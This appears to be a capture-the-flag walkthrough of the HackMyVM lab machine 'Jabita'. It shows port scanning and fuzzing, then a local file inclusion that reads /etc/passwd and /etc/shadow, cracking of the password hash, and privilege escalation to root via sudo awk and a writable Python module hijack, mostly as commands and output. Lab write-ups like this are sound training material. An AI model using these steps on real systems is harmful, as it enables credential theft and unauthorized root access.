Jabita
This machine was created by Rijaba1
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon jabita.hmvm
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
Hey I was thinking about this part of the code...oh wait, pull request is already done RiJaba1
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-17 12:31 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:31
Completed NSE at 12:31, 0.00s elapsed
Initiating ARP Ping Scan at 12:31
Scanning jabita.hmvm (10.0.2.13) [1 port]
Completed ARP Ping Scan at 12:31, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:31
Scanning jabita.hmvm (10.0.2.13) [65535 ports]
Discovered open port 80/tcp on 10.0.2.13
Discovered open port 22/tcp on 10.0.2.13
Completed SYN Stealth Scan at 12:31, 1.57s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.13.
Initiating NSE at 12:31
Completed NSE at 12:31, 0.00s elapsed
Nmap scan report for jabita.hmvm (10.0.2.13)
Host is up (0.000058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:29:A4:75 (Oracle VirtualBox virtual NIC)
NSE: Script Post-scanning.
Initiating NSE at 12:31
Completed NSE at 12:31, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.81 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[i] [Server info]
http://jabita.hmvm:80 [200 OK] Apache[2.4.52], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], IP[10.0.2.13]
[+] [fuzzin server]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Sep 17 12:31:58 2022
URL_BASE: http://jabita.hmvm:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://jabita.hmvm:80/ ----
+ http://jabita.hmvm:80/index.html (CODE:200|SIZE:62)
+ http://jabita.hmvm:80/server-status (CODE:403|SIZE:276)
-----------------
END_TIME: Sat Sep 17 12:31:59 2022
DOWNLOADED: 4612 - FOUND: 2
recon reports two open ports 22 for ssh and 80 for http
┌──(root@ghost)-[/home/ghost]
└─# wfuzz --hc=404 -t 500 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://jabita.hmvm/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://jabita.hmvm/FUZZ
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 1 L 5 W 62 Ch "# directory-list-2.3-medium.txt"
000000003: 200 1 L 5 W 62 Ch "# Copyright 2007 James Fisher"
000000004: 200 1 L 5 W 62 Ch "#"
000000007: 200 1 L 5 W 62 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000010: 200 1 L 5 W 62 Ch "#"
000000012: 200 1 L 5 W 62 Ch "# on atleast 2 different hosts"
000000002: 200 1 L 5 W 62 Ch "#"
000000005: 200 1 L 5 W 62 Ch "# This work is licensed under the Creative Commons"
000000008: 200 1 L 5 W 62 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000006: 200 1 L 5 W 62 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000009: 200 1 L 5 W 62 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000013: 200 1 L 5 W 62 Ch "#"
000000014: 200 1 L 5 W 62 Ch "http://jabita.hmvm/"
000000011: 200 1 L 5 W 62 Ch "# Priority ordered case sensative list, where entries were found"
000002398: 301 9 L 28 W 313 Ch "building"
000045240: 200 1 L 5 W 62 Ch "http://jabita.hmvm/"
000095524: 403 9 L 28 W 276 Ch "server-status"
Total time: 0
Processed Requests: 220560
Filtered Requests: 220543
Requests/sec.: 0
After more fuzzing we found building folder. After look inside we found a possible local file inclusion
┌──(root@ghost)-[/home/ghost]
└─# lfienum "http://jabita.hmvm/building/index.php?page=" | sed -e 's/Home\|Gallery\|Contact//g'
lfiǝnum ~by 0bfxgh0st*
[http://jabita.hmvm/building/index.php?page=/etc/passwd]
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
jack:x:1001:1001::/home/jack:/bin/bash
jaba:x:1002:1002::/home/jaba:/bin/bash
[http://jabita.hmvm/building/index.php?page=/etc/shadow]
root:$y$j9T$avXO7BCR5/iCNmeaGmMSZ0$gD9m7w9/zzi1iC9XoaomnTHTp0vde7smQL1eYJ1V3u1:19240:0:99999:7:::
daemon:*:19213:0:99999:7:::
bin:*:19213:0:99999:7:::
sys:*:19213:0:99999:7:::
sync:*:19213:0:99999:7:::
games:*:19213:0:99999:7:::
man:*:19213:0:99999:7:::
lp:*:19213:0:99999:7:::
mail:*:19213:0:99999:7:::
news:*:19213:0:99999:7:::
uucp:*:19213:0:99999:7:::
proxy:*:19213:0:99999:7:::
www-data:*:19213:0:99999:7:::
backup:*:19213:0:99999:7:::
list:*:19213:0:99999:7:::
irc:*:19213:0:99999:7:::
gnats:*:19213:0:99999:7:::
nobody:*:19213:0:99999:7:::
_apt:*:19213:0:99999:7:::
systemd-network:*:19213:0:99999:7:::
systemd-resolve:*:19213:0:99999:7:::
messagebus:*:19213:0:99999:7:::
systemd-timesync:*:19213:0:99999:7:::
pollinate:*:19213:0:99999:7:::
sshd:*:19213:0:99999:7:::
syslog:*:19213:0:99999:7:::
uuidd:*:19213:0:99999:7:::
tcpdump:*:19213:0:99999:7:::
tss:*:19213:0:99999:7:::
landscape:*:19213:0:99999:7:::
usbmux:*:19236:0:99999:7:::
lxd:!:19236::::::
jack:$6$xyz$FU1GrBztUeX8krU/94RECrFbyaXNqU8VMUh3YThGCAGhlPqYCQryXBln3q2J2vggsYcTrvuDPTGsPJEpn/7U.0:19236:0:99999:7:::
jaba:$y$j9T$pWlo6WbJDbnYz6qZlM87d.$CGQnSEL8aHLlBY/4Il6jFieCPzj7wk54P8K4j/xhi/1:19240:0:99999:7:::
...
We can read /etc/shadow this file contains hashed passwords.
┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hashes
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
joaninha (jack)
1g 0:00:00:01 DONE (2022-09-17 12:52) 0.5025g/s 1929p/s 1929c/s 1929C/s minerva..dodgers
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We obtained jack password
┌──(root@ghost)-[/home/ghost]
└─# ssh jack@jabita.hmvm
The authenticity of host 'jabita.hmvm (10.0.2.13)' can't be established.
ED25519 key fingerprint is SHA256:Sxz30elYyqNibTrCsnd7Xa6CrZ6qllyKNc+LfOMtZSo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'jabita.hmvm' (ED25519) to the list of known hosts.
jack@jabita.hmvm's password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-47-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Sep 17 04:55:47 PM UTC 2022
System load: 0.0 Processes: 114
Usage of /: 52.9% of 9.75GB Users logged in: 0
Memory usage: 30% IPv4 address for enp0s3: 10.0.2.13
Swap usage: 0%
6 updates can be applied immediately.
3 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Mon Sep 5 12:01:58 2022 from 192.163.0.90
jack@jabita:~$ sudo -l
Matching Defaults entries for jack on jabita:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never
User jack may run the following commands on jabita:
(jaba : jaba) NOPASSWD: /usr/bin/awk
As we can see user jaba can execute awk as sudo user
┌──(root@ghost)-[/home/ghost]
└─# gtfobins.py awk
...
[Sudo]
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudo awk 'BEGIN {system("/bin/sh")}'
...
jack@jabita:~$ sudo -u jaba awk 'BEGIN {system("/bin/bash")}'
jaba@jabita:/home/jack$ cd ../jaba
jaba@jabita:~$ cat user.txt
2e0942811f4k3f146c1be613cbc7a39
Time to elevate our privileges from jaba to root
jaba@jabita:~$ sudo -l
Matching Defaults entries for jaba on jabita:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never
User jaba may run the following commands on jabita:
(root) NOPASSWD: /usr/bin/python3 /usr/bin/clean.py
jaba@jabita:~$ sudo -u root /usr/bin/python3 /usr/bin/clean.py
Hello
jaba@jabita:~$ cat /usr/bin/clean.py
import wild
wild.first()
jaba@jabita:~$ find / wild.py 2>/dev/null | grep wild.py
/usr/lib/python3.10/wild.py
jaba@jabita:~$ cat /usr/lib/python3.10/wild.py
def first():
print("Hello")
jaba@jabita:~$ ls -la /usr/lib/python3.10/wild.py
-rw-r--rw- 1 root root 29 Sep 5 12:48 /usr/lib/python3.10/wild.py
Python library hijacking
jaba@jabita:~$ nano /usr/lib/python3.10/wild.py
jaba@jabita:~$ cat /usr/lib/python3.10/wild.py
import os
os.system('/bin/bash')
jaba@jabita:~$ sudo -u root /usr/bin/python3 /usr/bin/clean.py
root@jabita:/home/jaba# cat /root/root.txt
f4bb4cced0f4k3f1466fc77af70d3fe